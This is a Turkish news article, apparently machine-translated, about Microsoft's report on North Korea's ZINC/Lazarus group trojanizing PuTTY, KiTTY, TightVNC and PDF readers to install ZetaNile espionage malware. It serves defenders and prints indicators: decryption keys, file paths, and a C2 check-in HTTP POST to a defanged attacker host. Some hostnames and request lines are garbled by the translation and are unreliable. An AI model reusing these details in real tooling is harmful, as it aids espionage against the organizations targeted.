Getty Resimleri
Microsoft Perşembe günü yaptığı açıklamada, Kuzey Kore hükümeti tarafından desteklenen bilgisayar korsanlarının, medya, savunma ve havacılık ve BT hizmetleri sektörlerinde “sayısız” kuruluştan ödün vermeyi başaran devam eden bir kampanyada iyi bilinen açık kaynaklı yazılım parçalarını silahlandırdığını söyledi.
ZINC—Microsoft’un aynı zamanda Lazarus olarak da adlandırılan ve en çok Sony Pictures Entertainment’ın yıkıcı 2014 uzlaşmasını yürütmekle tanınan bir tehdit aktörü grubuna verdiği ad, PuTTY ve diğer meşru açık kaynaklı uygulamaları, en sonunda casusluk kötü amaçlı yazılımları yükleyen yüksek düzeyde şifrelenmiş kodlarla bağlamaktadır.
Bilgisayar korsanları daha sonra iş arayanlar olarak poz veriyor ve LinkedIn üzerinden hedeflenen kuruluşların bireyleri ile bağlantı kuruyor. Bilgisayar korsanları, bir dizi konuşma üzerinde bir güven düzeyi geliştirdikten ve sonunda onları WhatsApp messenger’a taşıdıktan sonra, bireylere çalışanların çalışma ortamlarına bulaşan uygulamaları yüklemeleri talimatını verir.
Microsoft
Microsoft Güvenlik Tehdit İstihbaratı ve LinkedIn Tehdit Önleme ve Savunma ekiplerinin üyeleri bir gönderide, “Aktörler, Haziran 2022’den bu yana çok sayıda kuruluşu başarıyla tehlikeye attı.” “ZINC’in bu kampanyada kullandığı platformların ve yazılımların geniş kullanımı nedeniyle, ZINC, birden fazla sektör ve bölgede bireyler ve kuruluşlar için önemli bir tehdit oluşturabilir.”
PuTTY, SSH, SCP, Telnet, rlogin ve ham soket bağlantısı dahil olmak üzere ağ protokollerini destekleyen popüler bir terminal öykünücüsü, seri konsol ve ağ dosya aktarım uygulamasıdır. İki hafta önce güvenlik firması Mandiant, Kuzey Kore ile bağları olan bilgisayar korsanlarının, bir müşterinin ağını başarıyla tehlikeye atan bir kampanyada onu Truva atı haline getirdiği konusunda uyardı. Perşembe günkü gönderi, aynı bilgisayar korsanlarının KiTTY, TightVNC, Sumatra PDF Reader ve muPDF/Subliminal Recording yazılımını, Microsoft’un ZetaNile adını verdiği aynı casus kötü amaçlı yazılımı yükleyen kodla silahlandırdığını söyledi.
Lazarus, bir zamanlar sadece marjinal kaynaklara ve becerilere sahip bir korsan grubuydu. Son on yılda, cesareti önemli ölçüde arttı. Son beş yılda kripto para borsalarına yönelik saldırıları, ülkenin kitle imha silahları programları için milyarlarca dolar üretti. Düzenli olarak yoğun şekilde güçlendirilmiş uygulamalardaki sıfırıncı gün güvenlik açıklarını bulup kullanırlar ve diğer devlet destekli gruplar tarafından kullanılan aynı kötü amaçlı yazılım tekniklerinin çoğunu kullanırlar.
Grup, kurbanlarına ilk vektör olarak öncelikli olarak hedef odaklı kimlik avına güveniyor, ancak zaman zaman diğer sosyal mühendislik biçimlerini ve web sitesi tavizlerini de kullanıyor. Ortak bir tema, üyelerin ödün vermek istedikleri kuruluşların çalışanlarını, genellikle onları Truva atlı yazılım yüklemeye zorlayarak veya onları kandırarak hedef almalarıdır.
Microsoft’un gözlemlediği Truva Atlı PuTTY ve KiTTY uygulamaları, yalnızca amaçlanan hedeflere virüs bulaşmasını ve yanlışlıkla başkalarına bulaşmamasını sağlamak için akıllı bir mekanizma kullanıyor. Uygulama yükleyicileri herhangi bir kötü amaçlı kod yürütmez. Bunun yerine, ZetaNile kötü amaçlı yazılımı yalnızca uygulamalar belirli bir IP adresine bağlandığında ve sahte işe alım görevlilerinin hedeflere verdiği oturum açma bilgilerini kullandığında yüklenir.
Truva Atılaştırılan PuTTY yürütülebilir dosyası, komut ve kontrol olarak kullanılmak üzere “0CE1241A44557AA438F27BC6D4ACA246” anahtarıyla sunulduğunda ikinci aşamalı bir yükü yükleyen ve şifresini çözen DLL arama emri kaçırma adı verilen bir teknik kullanır. C2 sunucusuna başarılı bir şekilde bağlandıktan sonra saldırganlar, güvenliği ihlal edilen cihaza ek kötü amaçlı yazılım yükleyebilir. KiTTY uygulaması da benzer şekilde çalışır.
Benzer şekilde, kötü niyetli TightVNC Görüntüleyici, son yükünü yalnızca kullanıcı ec2-aet-tech.w-ada’yı seçtiğinde yükler.[.]TightVNC Viewer’da önceden doldurulmuş uzak ana bilgisayarların açılır menüsünden amazonaw’lar.
Microsoft
Perşembe günkü yazısının devamı:
SecurePDF.exe adlı Sumatra PDF Reader’ın truva atlı sürümü, en az 2019’dan beri ZINC tarafından kullanılmaktadır ve benzersiz bir ZINC ticari aracı olmaya devam etmektedir. SecurePDF.exe, .PDF uzantılı silahlı bir iş uygulaması temalı dosya yükleyerek ZetaNile implantını yükleyebilen modülerleştirilmiş bir yükleyicidir. Sahte PDF, bir “SPV005” başlığı, bir şifre çözme anahtarı, şifreli ikinci aşama implant yükü ve dosya açıldığında Sumatra PDF Okuyucusunda görüntülenen şifreli sahte PDF içerir.
Belleğe yüklendikten sonra, ikinci aşama kötü amaçlı yazılım, kurbanın sistem ana bilgisayar adını ve cihaz bilgilerini özel kodlama algoritmalarını kullanarak C2 check-in işleminin bir parçası olarak bir C2 iletişim sunucusuna gönderecek şekilde yapılandırılır. Saldırganlar, gerektiğinde C2 iletişimini kullanarak güvenliği ihlal edilmiş cihazlara ek kötü amaçlı yazılım yükleyebilir.
Microsoft
Yazı şöyle devam etti:
muPDF/Subliminal Recording yükleyicisinin truva atlı sürümünde, setup.exe dosya yolunun olup olmadığını kontrol etmek için yapılandırılmış ISSetupÖnkoşullar\Setup64.exe var ve yaz C:\colrctl\colorui.dll içindeki gömülü yürütülebilir dosyayı çıkardıktan sonra diskte setup.exe. Daha sonra kopyalar C:\Windows\System32\ColorCpl.exe ile C:\ColorCtrl\ColorCpl.exe. İkinci aşama kötü amaçlı yazılım için kötü amaçlı yükleyici yeni bir süreç oluşturur C:\colorctrl\colorcpl.exe C3A9B30B6A313F289297C9A36730DB6Dve argüman C3A9B30B6A313F289297C9A36730DB6D geçer colorui.dll şifre çözme anahtarı olarak. DLL colorui.dll, Microsoft’un EventHorizon kötü amaçlı yazılım ailesi olarak izlediği, C:\Windows\Sistem\credwiz.exe veya iexpress.exe kurban check-in sürecinin bir parçası olarak C2 HTTP istekleri göndermek ve ek bir yük almak için.
POST /support/support.asp HTTP/1.1
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64;
Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729;
InfoPath.3; .NET4.0C; .NET4.0E)
Content-Length: 125
Host: www.elite4print[.]combbs=[encrypted payload]= &makale=[encrypted payload]
Gönderi, kuruluşların ağlarındaki herhangi bir uç noktaya virüs bulaşıp bulaşmadığını belirlemek için arayabilecekleri teknik göstergeler sağlar. Ayrıca, yöneticilerin ağ engelleme listelerine ekleyebilecekleri kampanyada kullanılan IP adreslerini de içerir.